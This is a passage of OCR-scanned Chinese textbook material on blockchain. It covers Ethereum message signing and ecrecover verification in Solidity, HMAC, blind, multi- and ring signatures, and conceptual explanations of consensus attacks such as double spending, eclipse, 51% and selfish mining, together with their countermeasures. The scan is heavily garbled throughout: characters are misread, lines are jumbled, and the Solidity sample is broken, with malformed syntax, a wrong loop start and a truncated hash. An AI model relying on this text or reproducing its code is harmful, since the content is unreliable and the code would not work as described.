console.log(“Signed data: ”+ signedData); 




















在 上 面 的 代码 中 ， 先 将 要 签名 的 数据 abc 生 成 哈 希 串 ， 使 用 web3.sha3("abc") 来 完成 。 接 着 使 用 当前 连接 节点 的 第 一 个 默认 账户 进行 签名 。 由 于 在 此 使 用 的 是 EtherumJs TestRPC， 它 默认 打开 了 账 
户 ; 否则 ， 还 需要 web3.personal.unlockAccount("0x.","",1000) 来 打开 数字 签名 所 使 用 的 账户 。 需 要 注意 的 是 ， 当 你 打开 你 的 账户 时 ， 可 能 有 安全 风险 。 因 为 其 他 程序 也 可 以 通过 访问 节点 进行 类 似 的 签 
名 ， 这 意味 着 它们 可 以 伪造 你 的 数据 ， 包 括 以 你 的 名 义 发 起 交易 ， 转 走 你 的 钱 。 


(1) 使 用 ecrecover() 对 签名 数据 进行 校 验 


ecrecover() 函 数 是 由 以 太 坊 提供 的 一 个 全 局 浮 数 ， 用 于 签名 数据 的 校 验 。 与 上 面 所 陈述 的 方式 略 有 不 同 的 是 ， 这 个 函数 返回 的 是 签名 者 的 公 y 匙 地址。 如 果 返 回 结果 是 签名 者 的 公 是 地址， 那么 说 明 数 
据 是 正确 的 。ecrecover() 函 数 定义 如 下 : 


ecrecover (bytes32 hash, uint8 v, bytes32 r, bytes32 s) returns (address) 


ecrecover() 函 数 需 要 4 个 参数 : 需要 被 签名 数据 的 哈 希 结果 值 和 r、s、v 值 。 其 中 ，r、s、YVv 分 别 来 自 签名 结果 串 。 
其 中 v 取 出 来 的 值 或 者 是 00， 或 者 是 01。 要 使 用 时 ， 先 要 将 其 转换 为 整 型 ， 再 加 上 27， 人 得 到 27 或 28。 在 调用 函数 时 ，v 将 填 入 27 或 28。 


(2) 使 用 Solidity 的 ecrecoverDecode() 验 证 签名 的 完整 示例 如 图 6-35 所 示 。 


上 述 代码 使 用 临时 写 的 slice() 函 数 把 数字 签名 中 的 r、s、v 切 割 出 来 。 由 于 返回 的 仍 是 bytes 类 型 ， 所 以 使 用 bytesToBytes320 进 


明 ， 需 要 对 v 值 加 上 27 后 再 进行 调用 。 最 后 调用 decode(0 函 数 ， 得 


行 类 型 
得 到 公 铀 0x60320b8a71bc314404ef7d194ad8cacObee1e331。 


类 型 转换 。 另 外 需要 注意 的 是 ecrecoverDecode()， 根 据 前 面 的 说 


// 恰 左 舱 数据 扰 段 切 乔 出 前 和 长 度 
function slice{bytes memory data, uint start, uint len) returns (bytes)t{ 
bytes memory b = new bytes(len); 


for(uint i = 6; i < len; i++){ 
b[i] = data[i + start]; 


/1 信用 ecrecover 渡 香 公 绷 


function ecrecoverDecode(bytes32 r, bytes32 s, byte v1) returns (address addr){ 
Uint8 Vv = uint8(v1) + 27; 


addr = ecrecover(hex "4e03657aea453a94fc7d47ba826c8d667c6dle6e33a643a036ec44f58fa 


//Mbytes 糙 坑 为 bytes32 


function bytesToBytes32(bytes memory source) returns (bytes32 result) { 
assembly { 


result := mload(add(source, 32)) 





图 6-35 ectecovetDecode0 示例 代码 


6.3.2 ”典型 的 数字 签名 技术 剖析 


1.HMAC 


HMAC 的 全 称 是 Hash-based Message Authentication Code， 即 “基于 Hash 的 消息 认证 码 ”。 其 基本 工作 流程 : 对 某 个 消息 ， 利 用 提前 共享 的 对 称 密 钥 和 Hash 算 法 进行 加 密 处 理 ， 得 到 HMAC 
值 。 该 HMAC 值 提供 方 可 以 证 明 自 己 拥有 共享 的 对 称 密 铀 ， 并 且 消 息 自 身 可 以 利用 HMAC 来 确保 未 经 纂 改 。 其 典型 的 加 密 函 数 定义 如 下 : 





HMAC (K, H, Message) 


其 中 ，K 为 提前 共享 的 对 称 密 钥 ，H 为 提前 商定 的 Hash 算 法 (一 般 为 公认 的 经 典 算法 ) ，Message 为 要 处 理 的 消息 内 容 。 如 果 不 知道 K 和 H， 则 无 法 根据 Message 得 到 准确 的 HMAC 值 。 
HMAC 一 般 用 于 证 明 身 份 的 场景 。 例 如 ，A、B 提 前 共享 密 铀 ，A 发 送 随 机 串 给 B，B 对 称 加 密 处 理 后 把 HMAC 值 发 给 A，A 收 到 了 自己 再 重新 算 一 遍 ， 只 要 相同 说 明 对 方 确实 是 B。 


HMAC 存 在 的 主要 问题 是 需要 共享 密 钥 。 在 密 钥 可 能 被 多 方 拥有 的 场景 下 ， 无 法 证 明 消息 确实 来 自 某 人 “(Non-repudiation) ; 反之 ， 如 果 采 用 非 对 称 加 密 方式 ， 则 可 以 证 明 。 


盲 签名 允许 消息 者 先 将 消息 盲 化 ， 而 后 让 签名 者 对 盲 化 的 消息 进行 签名 ， 最 后 消息 拥有 者 将 签名 除去 盲 因子 ， 得 到 签名 者 关于 原 消息 的 签名 。 这 是 接收 者 在 不 让 签名 者 获取 所 签署 消息 具体 内 容 的 情 
况 下 所 采取 的 一 种 特殊 的 数字 签名 技术 ， 它 除了 满足 一 般 的 数字 签名 条 件 外 ， 还 必须 满足 下 面 的 两 条 性 质 。 


` 签名 者 对 其 所 签署 的 消息 是 不 可 见 的 ， 即 签名 者 不 知道 他 所 签署 消息 的 具体 内 容 。 
` 签名 消息 不 可 追踪 ， 即 当 签 名 消息 被 公布 后 ， 签 名 者 无 法 知道 这 是 他 哪 次 签署 的 。 


天 于 言 签名 ， 如 果 曾 经 给 出 了 一 个 非常 直观 的 说 明 。 所 谓 言 签名 ， 就 是 先 将 隐蔽 的 文件 放 进 信封 里 ， 而 除去 言 因 子 的 过 程 就 是 打开 这 个 信封 。 当 文件 在 一 个 信封 中 时 ， 任 何人 不 能 读 它 。 对 文件 签名 
就 是 通过 在 信封 里 放 一 张 复写 纸 ， 签 名 者 在 信封 上 签名 时 ， 他 的 签名 便 透 过 复写 纸 签到 文件 上 。 


一 般 来 说 ， 一 个 好 的 盲 签名 应 该 具有 以 下 的 性 质 。 

. 不 可 伪造 性 。 除 了 签名 者 本 人 外 ， 任 何人 都 不 能 以 他 的 名 义 生 成 有 效 的 讶 签名。 这 是 一 条 最 基本 的 性 质 。 

` 不 可 抵赖 性 。 签 名 者 一 旦 签署 了 茶 个 消息 ， 他 无 法 否认 自己 对 消息 的 签名 。 

` 讶 性。 签名 者 虽然 对 茶 个 消息 进行 了 签名 ,但 他 不 可 能 得 到 消息 的 具体 内 容 。 

` 不 可 跟踪 性 。 一 旦 消息 的 签名 公开 后 ， 签 名 者 不 能 确定 自己 何 时 签署 的 这 条 消息 。 

满足 上 面 几 条 性 质 的 盲 签名 ， 被 认为 是 安全 的 。 这 4 条 性 质 既 是 我 们 设计 盲 签名 所 应 遵循 的 标准 ， 又 是 我 们 判断 讶 签名 性 能 优 务 的 根据 。 
另外 ,方案 的 可 操作 性 和 实现 的 效率 也 是 我 们 设计 讶 签名 时 必须 考虑 的 重要 因素 。 一 个 盲 签名 的 可 操作 性 和 实现 速度 取决 于 以 下 几 个 方面 : 


. 密 钥 的 长 度 ; 


* 讶 签名 的 算法 和 验证 算法 。 
3. 多 重 签名 

n 个 持 有 人 中 ， 收 集 到 至 少 m 个 签名 ， 即 认为 合法 ， 这 种 签名 被 称 为 多 重 签名 。 其 中 ，n 是 提供 的 公 钥 个 数 ，m 是 需要 匹配 公 钥 的 最 少 签名 个 数 。 
4. 环 签名 


环 签名 由 Rivest、shamir 和 Tauman 3 位 密码 学 家 在 2001 年 首次 提出 。 环 签名 属于 一 种 简化 的 群 签名 。 签 名 者 首先 选 定 一 个 临时 的 签名 者 集合 ， 集 合 中 包括 签名 者 自身 。 然 后 签名 者 利用 自己 的 私 钥 
和 签名 集合 中 其 他 人 的 公 钥 就 可 以 独立 地 产生 签名 ， 而 无 须 他 人 的 帮助 。 签 名 者 集合 中 的 其 他 成 员 可 能 并 不 知道 自己 被 包含 在 其 中 。 


6.4 共识 攻击 


本 节 将 介绍 共识 攻击 的 一 些 主要 类 型 。 注 意 ， 本 节 提 到 的 一 些 攻击 很 多 仅 是 理论 上 可 能 存在 ， 但 实施 的 时 候 因 为 需要 大 量 算 力 、 股 权 等 支持 ， 实 际 上 很 难 达成 ， 并 不 需要 过 于 担心 其 风险 。 
1. 双 花 攻击 
双 花 攻击 (Double Spending Attacks) 是 指 同 一 个 数字 货币 可 以 人 花费 一 次 以 上 。 


在 区 块 链 中 ， 每 一 笔 交 易 都 是 一 个 请 求 。 区 块 链 会 验证 这 个 交易 的 请 求 ， 并 检查 其 所 使 用 的 资产 的 有 效 性 、 是 否 使 用 了 已 花费 的 资产 来 决定 是 否 提 交 进 入 共识 ， 并 广播 成 功 验证 的 账本 。 如 果 系统 对 
双 花 攻击 没有 防范 ， 将 会 是 一 件 非 常 可 怕 的 事情 。 
这 也 是 每 一 个 区 块 链 必须 要 解决 的 问题 ， 在 不 同 的 共识 体系 下 解决 方案 也 会 不 同 。 
(1) PoW 共 识 算法 


在 PoW 体 系 下 ， 系 统 同 时 允许 存在 多 条 分 又 链 ， 每 一 条 链 都 可 以 声称 自己 是 正确 的 。 但 是 有 一 个 最 长 有 效 原理 ， 即 不 管 在 什么 时 候 ， 最 长 的 那 条 区 块 链 被 认为 是 拥有 最 多 的 工作 量 ， 称 之 为 主 链 。 当 
然 ， 如 果 其 他 的 分 支 链 在 接 下 来 获得 了 更 多 的 工作 量 ， 并 超越 了 原先 主 链 的 长 度 ， 那 么 主 链 就 会 变 成 这 条 新 链 ， 而 之 前 的 主 链 则 会 被 认为 是 无 效 的 链 ， 而 且 在 这 个 分 又 上 所 进行 的 交易 会 被 认为 是 无 效 
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的 ， 转 而 以 新 的 主 链 为 主 。 比 特 币 目前 大 概 需 要 12 个 区 块 的 确认 时 间 ， 才 能 基本 确定 某 笔 交 易 的 不 可 算 改 ， 因 为 要 超越 这 一 工作 量 将 是 非常 困难 的 ， 并 且 攻 击 的 代价 会 随 着 区 块 数 的 增加 变 得 越 来 越 困 
难 。 


在 这 个 过 程 中 有 一 种 可 能 ， 在 比特 币 的 众多 分 文中 ， 假 设 在 第 一 条 链 分 文 上 人 花费 了 一 笔 钱 ， 再 假设 黑客 能 操控 算 力 ， 让 第 二 条 链 能 拥有 更 多 的 算 力 并 超越 了 第 一 条 链 的 长 度 ， 那 么 第 一 条 链 的 交易 便 
相当 于 回 滚 了 ， 黑 客 就 能 重新 再 拥有 第 一 条 链 上 人 花费 掉 的 比特 币 ， 这 个 过 程 就 是 比特 币 上 的 双人 花 。 


因此 ，PoW 共 识 算法 要 求 等 待 一 定 的 区 块 确认 数 ， 当 工作 量 达 到 几乎 无 法 超越 、 回 滚 的 状态 时 ， 才 可 以 确认 为 资产 的 成 功 转移 。 
(2) PoS、DPoS、DBFT 共 识 算法 


~ 


此 类 算法 是 确定 性 的 ， 交 易 一 旦 确认 就 不 可 逆转 ， 因 此 没有 双 花 攻击 。 


双 花 攻击 的 特例 是 重 放 攻击 ， 即 攻击 者 “ 重 放 ”他 在 网 络 上 “窃听 ”或 在 区 块 链 中 “看 到 ”的 消息 。 由 于 这 样 会 导致 整个 验证 实体 重 做 计算 密集 型 的 动作 和 /或 影响 对 应 的 合约 状态 ， 同 时 它 在 攻击 侧 
又 只 需要 很 少 的 资源 ， 因 此 重 放 攻 击 也 是 所 有 区 块 链 必须 要 解决 的 一 个 问题 。 如 果 是 一 笔 文 付 交易 ， 那 么 问题 就 更 大 了 ， 重 放 可 能 会 导致 在 不 需要 付款 人 的 参与 下 ， 多 于 一 次 的 支付 。 


对 于 UTXO 模 型 ， 要 防止 重 放 攻 击 ， 共 识 节点 只 需要 对 收 到 的 交易 检查 其 Hash 是 否 在 账本 中 存在 ， 或 者 检查 交易 的 input 是 否 已 经 被 化 费 即 可 。 
对 于 Balance 模 型 ， 在 交易 中 放置 一 个 honce 值 ， 要 防止 重 放 攻 击 ， 共 识 节点 只 需要 对 收 到 的 交易 检查 其 Hash 是 否 在 账本 中 存在 即 可 。 
2. 权 利 讨 迫 


权利 压迫 (Grinding Attacks) 是 指 攻击 者 在 获得 记 账 权 的 时 候 ， 利 用 自己 手中 的 权利 实施 一 些 计算 或 者 一 些 操作 让 系统 的 随机 数 产生 俩 斜 ， 来 增加 自己 下 一 次 获得 记 账 权 的 可 能 性 ， 可 能 的 方式 如 


方式 一 : 一 个 验证 者 通过 一 些 参数 组 合 或 者 找到 一 个 特殊 的 参数 来 增加 自己 被 选择 ， 产 生 一 个 有 效 块 的 可 能 性 。 

方式 二 : 利用 对 当前 块 的 控制 能 力 去 影响 下 一 个 块 。 

举 一 个 不 真实 的 例子 ， 块 N+1 的 随机 性 依赖 于 块 N 的 签名 ， 如 果 一 个 验证 者 在 当前 块 中 一 直 指定 自己 是 下 一 个 块 的 验证 者 ， 便 永远 控制 住 了 整个 系统 。 
方式 三 : 通过 跳 过 块 的 方式 ， 控 制 出 块 的 随机 性 。 


由 于 N+1 的 随机 性 依赖 于 N 的 验证 者 ， 验 证 者 得 以 通过 跳 过 自己 创建 的 块 的 方式 来 控制 出 块 的 随机 性 。 当 然 这 会 丢失 一 个 块 的 奖励 ， 但 是 随 之 而 来 的 ， 他 可 能 拥有 下 面 数 十 个 块 高 于 平均 数 的 随机 性 
控制 能 力 。 


Pos 提 出 了 两 种 解决 方案 。 
(1) 第 一 种 方法 


权利 压迫 的 方式 一 和 方式 二 比较 容易 解决 ， 一 般 的 做 法 是 要 求 验证 者 事先 抵押 自己 的 资产 ， 并 且 也 不 使 用 那些 容易 被 操纵 的 信息 来 产生 随机 数 。 对 于 方式 三 ， 可 以 采用 以 下 的 策略 : 首先 考虑 使 用 基 
于 秘密 共享 或 者 确定 性 门限 函数 的 方案 ， 并 且 验 证 者 协同 生成 随机 值 ， 那 么 除非 大 多 数 验证 者 勾结 ， 否 则 这 些 方案 对 于 所 有 操作 都 是 强大 的 。 


(2) 第 二 种 方法 
使 用 验证 者 事先 提交 信息 ( 即 发 布 sha3 (x) ) 的 密码 方案 ， 在 块 中 友 布 x， 随 后 将 x 添 加 到 随机 性 池 中 。 这 里 有 两 个 理论 攻击 方式 。 


1) 在 承诺 时 间 处 理 x。 这 是 不 切实 际 的 ， 因 为 随机 性 结果 会 考虑 到 许多 参与 者 的 价值 ， 如 果 他 们 中 的 一 个 是 诚实 的 ， 那 么 产 出 将 是 一 个 统一 的 分 配 结果 。 均 匀 分 布 与 任意 多 个 任意 偏 置 分 布 异 或 ， 仍 
然 给 出 均匀 分 布 。 


2) 有 选择 地 避免 友 布 块 。 这 种 攻击 花费 了 一 个 块 奖 励 机 会 的 成 本 ， 并 且 因 为 该 方案 阻止 任何 人 看 到 除了 下 一 个 以 外 的 任何 未 来 验证 者 ， 所 以 它 几 乎 无 法 提供 多 于 一 个 块 的 奖励 。 唯 一 的 例外 情况 是 ， 
如 果 验 证 程序 跳 过 ， 则 下 一 个 验证 程序 再 运行 ， 如 果 验 证 程序 的 内 容 是 相同 的 ， 那 么 这 会 是 一 个 严重 的 问题 。 对 此 可 以 通过 明确 的 跳 过 惩罚 ， 来 加 大 惩罚 更 多 的 跳跃 。 


3) Iddo Bentov 的 “多 数 信 标 ”是 一 种 解决 方案 ， 它 通过 获取 由 其 他 信和 标 生成 的 前 N 个 随机 数 的 位 的 大 部 分 来 产生 随机 数 ( 即 ， 如 果 大 部 分 源 数字 中 的 第 一 个 比特 为 1， 则 结果 的 第 一 比特 位 为 1， 否 
则 为 0; 如 果 源 数字 中 的 大 部 分 第 二 个 比特 为 1， 则 结果 的 第 二 个 比特 为 1， 否 则 为 0 等 ) 。 忠 而 言 之 ， 人 存在 许多 已 知 的 权利 压迫 解决 方案 。 这 个 问题 更 像 差 分 密码 分 析 ， 而 不 是 停滞 的 问题 一 个 让 利益 
相关 者 、 设 计 者 最 终 理 解 并 且 现 在 知道 如 何 克 服 的 麻烦 ， 而 不 是 一 个 根本 的 、 不 可 避免 的 缺陷 。 


. PoW: 记 账 权 的 争夺 依赖 于 算 力 ， 因 此 不 存在 权利 压迫 。 
. PoS: 存在 权利 压 近 ， 需 要 加 入 其 他 机 制 来 避免 。 
" DPoS: DPoS 其 实 更 多 的 是 一 种 理念 ， 具 体 要 看 delegate 的 实现 。 如 果 不 是 确定 的 随机 性 ， 依 然 会 存在 权利 压迫 的 可 能 性 。 如 果 是 按照 顺序 执行 的 ， 则 没有 这 个 问题 。 
* PBFT: 确定 性 的 记 账 人 顺序 ， 公 平 的 随机 性 ， 因 此 不 存在 权利 压迫 。 
.DBFT: 引入 代 议 制 的 选举 委托 机 制 ， 在 公平 的 基础 上 推选 出 可 信 的 确定 性 的 记 账 人 列表 ， 并 按照 顺序 来 验证 出 块 ， 因 此 不 存在 权利 压迫 问题 。 
3. 交 易 拒绝 
在 交易 拒绝 攻击 (Transaction Denial Attacks) 中 ,对手 的 目的 是 阻止 某 笔 交 易 成 功 完成 。 例 如 ， 对 手 可 能 想 要 瞄准 一 个 特定 账户 ， 并 防止 账户 持 有 人 发 布 交易 。 
这 个 问题 可 以 分 2 个 阶段 来 分 析 。 


1) 在 进入 P2P 网 络 之 前 ,任何 共识 算法 都 是 一 样 的 ， 如 果 发 出 交易 的 节点 在 这 个 时 间 点 的 网 络 上 是 被 控制 的 ， 那 么 这 笔 交 易 是 没 办 法 流转 到 P2P 网 络 的 。 


2) 在 进入 P2P 网 络 之 后 ，P2P 网 络 会 发 散 式 地 广播 这 笔 交 易 到 所 有 的 共识 节点 。 于 是 这 个 问题 就 退化 成 了 51% 攻 击 ， 即 是 否 控制 了 共识 的 问题 (参见 ?1% 攻 击 ) 。 
4. 无 法 同步 攻击 


无 法 同步 攻击 (Desynchronization Attacks) 就 是 让 一 个 节点 无 法 与 网 络 中 的 其 他 节点 保持 统一 步调 。 比 如 ， 让 节点 A 收 到 区 块 的 时 间 总 是 要 比 其 他 节点 晚 一 些 ， 这 样 即使 A 成 功 记 账 ， 也 会 远 远 落 
后 于 其 他 节点 ， 从 而 不 被 网 络 接受 ， 也 就 造成 了 节点 A 无 法 获得 其 算 力 预期 的 收益 。 


这 个 通常 是 PoW、PoS、DPoS 的 间 题 ;PBFT 或 者 DBFT 因 为 记 账 节点 首先 会 选择 高 性 能 的 服务 器 ， 并 且 通 常 并 不 会 直接 开放 在 开放 性 网 络 中 ， 而 是 由 同步 节点 作为 连接 对 象 ， 因 此 共识 节点 很 难产 生 
无 法 同步 的 问题 。 通 常 达成 共识 并 即刻 落 账 。 


5. 日 蚀 攻击 


日 蚀 攻击 〈Eclipse Attacks) 是 一 种 针对 比特 币 网 络 的 攻击 。 每 个 比特 币 网 络 节 点 默认 最 多 允许 被 117 个 其 他 节点 连接 (输入 连接 ) ， 同 时 最 多 可 以 向 其 他 8 个 节点 发 起 连接 (输出 连接 ) 。 


日 蚀 攻 击 的 目标 就 是 比特 币 节点 的 接 入 连接 。 通 过 控制 某 一 个 比特 币 节 点 的 接 入 连接 来 达到 控制 比特 币 输入 的 消息 来 源 ， 使 这 个 节点 仅 跟 恶意 节点 通信 。 日 蚀 攻 击 中 ， 攻 击 者 只 需 40% 的 算 力 就 可 以 
达到 51% 攻击 的 效果 。 假 设 比 特 币 网 络 分 为 2 个 算 力 为 30% 的 节点 和 一 个 算 力 为 40% 的 节点 ， 如 果 攻 击 者 拥有 算 力 为 40% 的 节点 ， 他 就 能 通过 日 蚀 攻 击 来 达到 分 割 这 两 个 30% 算 力 的 节点 ， 使 之 不 能 正常 出 
块 。 这 样 攻击 者 拥有 的 40% 算 力 的 节点 就 能 控制 整个 网 络 。 


日 蚀 攻击 的 实施 方法 如 下 。 


1) 攻击 者 可 以 通过 某 种 方法 把 正常 的 比特 币 节 点 的 输出 连接 都 连接 到 攻击 者 控制 的 恶意 节点 ， 同 时 比特 币 节 点 的 输入 连接 都 被 恶意 节点 连 满 。 那 如 何 做 到 让 正常 的 比特 币 节 点 都 连接 到 恶意 的 节点 


呢 ? 在 比特 币 节点 中 有 了 两 张 表 ， 一 张 叫 作 New Table， 用 来 保持 当前 节点 所 感知 到 的 网 络 中 其 他 节点 的 地 址 ， 另 一 张 叫 作 Tried Table， 用 于 保存 曾经 连接 过 的 节点 。 比 特 币 节点 每 次 建立 输出 连接 的 ， 都 
是 在 这 两 张 表 中 选择 一 个 时 间 截 较 新 的 节点 连接 。 通 过 控制 僵尸 网 络 不 断 地 去 连接 这 个 比特 币 节点 ， 即 可 达到 刷新 这 两 张 表 的 目的 ， 使 得 这 两 张 表 保存 了 大 量 的 恶意 节点 的 地 址 信息 。 


2) 攻击 者 再 通过 DDoS 攻击 等 方法 ， 让 这 个 比特 币 节点 重启 。 这 样 这 个 比特 币 节点 连 到 的 就 都 是 攻击 者 控制 的 恶意 节点 了 。 

从 本 质 上 说 ,日 蚀 攻 击 是 一 种 针对 P2P 网 络 的 攻击 。 这 种 攻击 方法 与 共识 算法 关系 不 大 ， 理 论 上 讲 对 PoW、PoS、DbFT 等 共识 算法 都 有 效 ， 但 是 它 非 常 依赖 于 节点 在 P2P 网 络 处 理 上 的 漏洞 ， 因 此 实 
施 攻击 不 具备 普 适 性 。 
6.51% 攻 击 (大 多 数 攻击 ) 


先 来 看 看 大 多 数 攻击 (Most Attacks) 在 PoW 共 识 模型 中 的 表现 。 若 某 个 组 织 掌握 了 整个 网 络 的 大 多 数 算 力 (51%) ， 那 么 该 组 织 构造 一 个 有 效 区 块 的 平均 时 间 会 少 于 其 他 所 有 的 矿工 ， 从 而 在 相同 
的 时 间 内 该 组 织 可 以 构造 出 更 多 的 区 块 ， 并 以 最 长 的 分 支 被 网 络 接受 为 最 终 确认 区 块 。 这 样 整 个 区 块 链 处 于 该 组 织 的 控制 之 下 。 


显而易见 ， 网 络 规模 越 大 ， 总 算 力 越 强 ， 掌 握 大 多 数 算 力 的 难度 亦 越 高 。 
在 Pos 模 型 中 ，51% 攻 击 转变 为 掌握 网 络 中 的 大 多 数 股权 ， 其 攻击 的 代价 从 算 力 (电力 ) 变 为 资产 。 
在 BFT 类 共识 模型 中 ， 控 制 了 1/3 的 共识 节点 即 可 阻止 共识 ， 控 制 了 2/3 的 共识 节点 即 可 操作 共识 结果 。 由 于 此 类 模型 中 共识 节点 通常 是 一 个 特定 的 范围 ， 其 安全 性 依赖 于 选择 共识 节点 时 的 审查 机 


制 ， 以 及 对 节点 的 安全 保护 。 


7. 贿 赂 攻击 


. PoW 算 法 : 由 于 每 个 节点 都 可 以 自由 地 加 入 ， 有 资格 参与 共识 生成 区 块 ， 因 此 这 种 攻击 在 策略 上 是 可 行 的 。 
. PoS、DPoS 算 法 : 参与 共识 的 节点 需要 占据 一 定 的 股份 权益 ， 因 此 实施 这 种 攻击 需要 贿赂 绝 大 多 数 权益 节点 。 


* DBFT 共 识 算 法 : 在 容忍 f 个 节点 错误 的 情况 下 共有 3f+1 个 共识 节点 ， 因 此 贿赂 什 1 个 节点 后 能 使 共识 暂停 出 块 ， 贿 赂 2ft+1 以 上 节点 时 才能 按照 对 敌手 方 有 利 的 方式 出 块 。 


8. 长 程 攻击 


长 程 攻击 (Long-Range Attacks) 来 源 于 用 户 不 得 不 撤回 保证 金 的 权利 。 这 意味 着 攻击 者 可 以 从 任意 长 度 的 距离 建立 一 个 分 叉 而 不 用 担心 被 削减 。 一 旦 保证 金 被 解除 绑 定 ， 激 励 不 从 某 个 高 度 区 块 前 
进行 长 距离 投票 就 被 取消 了 。 换 句 话说 ， 当 超过 2/3 的 验证 者 解除 了 绑 定 ， 那 么 他 们 就 可 以 恶意 地 创造 包含 之 前 验证 者 集 的 第 二 条 链 ， 这 可 能 导致 任意 的 交易 。 


解决 方法 如 下 。 


` 忽视 从 那些 当前 没有 保证 金 存款 的 节点 发 出 的 共识 信息 ， 能 够 解决 或 规避 长 程 攻击 问题 。 解 除 绑 定 保证 金 必 须要 经 过 一 个 “解冻 ”期 。 解 除 绑 定之 后 ， 代 币 需 要 数 周到 数 月 的 “解冻 ”时 间 ， 用 以 


实现 “同步 性 ”前提 《〈 即 延迟 的 消息 ) 。 
` 禁止 在 N 个 块 之 前 恢复 ， 其 中 N 是 保证 金 的 长 度 。 该 规则 可 使 任何 长 程 分 又 无 效 。 


此 类 攻击 仅 针对 Pos 共 识 。 


9. 历 史 多 数 攻击 


历史 多 数 攻击 (Past Majority Attacks) 指 的 是 历史 上 对 某 区 块 链 拥有 控制 权 ( 即 共识 节点 中 的 大 多 数 ) 的 组 织 或 个 人 ,利用 自己 历史 上 存在 的 对 该 网 络 的 控制 权 ， 从 这 个 历史 时 间 点 开启 新 的 分 
又 ， 但 是 这 种 分 又 一 般 无 法 影响 到 原来 主 网 络 上 的 资产 ， 只 是 fork 出 一 条 新 的 区 块 链 。 











* 在 PoS 模 型 下 ， 当 某 个 组 织 在 某 个 历史 区 块 拥 有 控制 权时 ， 其 可 以 重 构 ， 从 而 危及 他 人 的 权益 。 然 而 让 重 构 的 区 块 被 网 络 所 接受 ， 攻 击 者 需 进 一 步 重 构 一 条 新 的 分 支 来 取代 当前 分 支 。 


PoW 模 型 下 ， 修 改 历史 区 块 需 重 新 计算 有 效 哈 希 ， 并 构建 足够 长 的 分 支 以 取代 当前 分 支 ， 这 需要 非常 庞大 并 且 超 过 现 有 POW 网 络 整 体 算 力 的 基础 上 才 有 可 能 。 





. BFT 类 模型 下 ， 亦 需要 多 数 共识 节点 均 同 意 方 可 构造 新 的 分 支 。 因 此 在 POW 和 BFT 类 模型 下 ， 此 攻击 退化 为 51% 攻 击 。 


" BFT 模 型 下 ， 攻 击 者 需要 控制 过 去 时 间 点 上 2/3 以 上 的 节点 ， 才 可 以 控制 整个 共识 网 络 ， 才 可 以 发 动 历史 多 数 攻击 。 


10. 自 私 挖 矿 


诚实 的 挖 矿 策略 是 ， 挖 到 区 块 之 后 ， 就 进行 全 网 广播 。 而 在 自私 挖 矿 (Self ish-mining) 策略 中 ,矿工 维 护 两 个 区 块 链 ， 一 个 是 公开 的 ， 一 个 是 私密 的 。 一 开始 私密 区 块 链 就 等 于 公开 区 块 链 ;每 次 
矿工 挖 到 区 块 之 后 ， 添 加 到 私密 区 块 链 上 ， 而 不 广播 给 其 他 人 ， 这 个 时 候 矿工 就 拥有 了 领先 其 他 人 一 个 区 块 的 优势 ;然后 接着 在 私密 链 上 挖 矿 。 即 使 公开 区 块 链 迅速 追 上 了 私密 区 块 链 ， 该 矿工 还 是 能 将 
该 区 块 广播 出 去 。 对 于 网 络 上 的 其 他 节点 来 说 ， 这 两 个 区 块 的 高 度 是 相同 的 ， 差 不 多 有 1/2 的 概率 ， 自 私 区 块 会 被 其 他 节点 承认 ， 这 样 自私 矿工 就 有 了 相对 其 他 人 的 优势 。 


利用 自私 挖 矿 策略 ,矿工 可 以 获得 的 收益 比例 是 大 于 其 算 力 在 全 网 算 力 的 比例 的 。 这 种 攻击 对 PoS/DPS/PBFT/DBFT 不 适用 。 


11. 无 利害 关系 
首先 要 引入 一 个 概念 ， 即 剑 手 (Slasher) 协议 。 如 果 你 在 同一 个 层级 的 分 又 上 同时 签署 了 两 份 协议 ， 那 么 你 就 会 失去 你 所 能 得 到 的 区 块 奖励 。 
无 利害 关系 (Nothing At Stake Attacks) 问题 指 的 是 ， 权 益 证 明 机 制 中 的 矿工 最 佳 的 策略 是 在 所 有 的 又 上 进行 挖 矿 ， 因 为 签名 的 制造 非常 便宜 。 


解决 方法 : 将 保证 金 加 入 剑 手 协议 意味 着 无 利害 天 系 问题 被 正式 解决 。 只 有 当 验 证 节点 缴纳 存款 保证 金 的 时 候 ， 它 签署 的 承诺 才 有 意义 。 当 一 个 保证 金 节点 在 相同 高 度 处 创建 或 签署 两 个 区 块 时 ， 则 
其 存款 保证 金 就 会 被 削减 ， 并 且 这 种 行为 会 被 认为 是 “明显 不 良 的 行为 ”。 苟 刻 以 及 允许 这 种 惩罚 的 条 件 ， 对 于 所 有 的 BFT 协 议 都 是 有 帮助 的 。 此 类 攻击 仪 针对 PoS 共 识 。 


6.5 ”区 块 链 安全 性 考虑 


安全 间 题 在 信息 化 社会 始终 是 主旋律 。 有 人 提出 云 计算 的 口号 “使 用 计算 和 存储 束 像 水 和 电 一 样 ”， 但 现在 还 没有 人 愿意 将 自己 隐私 的 内 容 放 到 云 上 ， 这 是 因为 安全 性 的 问题 没有 最 终 解决 。 区 块 链 
也 是 这 样 。 有 人 说 区 块 链 的 问题 是 “没有 杀手 级 应 用 ”， 但 越 到 后 面 ， 制 约 区 块 链 发 展 的 最 重要 的 因素 ， 很 可 能 便 是 安全 问题 。 


因此 ， 安 全 性 威胁 是 区 块 链 迄今 为 止 所 面临 的 最 重要 的 问题 之 一 。 从 安全 性 分 析 的 角度 ， 区 块 链 面 临 着 算法 安全 性 、 协 议 安全 性 、 使 用 安全 性 、 实 现 安全 性 和 系统 安全 性 的 挑战 。 


在 算法 方面 ， 目 前 区 块 链 的 算法 还 是 相对 安全 的 ， 不 过 随 着 数学 、 密 码 学 和 计算 技术 的 友 展 会 变 得 越 来 越 脆弱 。 据 估计 ， 以 目前 “天 河 二 号 ”的 算 力 来 说 ， 产 生 比 特 币 SHA256 哈 希 算 法 的 一 个 哈 希 碰 
撞 大 约 需 要 248 年 ， 但 随 着 量子 计算 机 等 新 计算 技术 的 发 展 ， 未 来 非 对 称 加 密 算法 具有 一 定 的 破解 可 能 性 ， 这 也 是 区 块 链 技术 面临 的 潜在 安全 威胁 。 


在 协议 方面 ， 基 于 PoW 共 识 过 程 的 区 块 链 主要 面临 的 是 51% 攻 击 问题 ， 即 节点 通过 掌握 全 网 超过 51% 的 算 力 就 有 能 力 成 功 自 改 和 伪造 区 块 链 数据 。 最 开始 创建 比特 币 系 统 时 ，51% 算 力 是 考虑 到 电子 
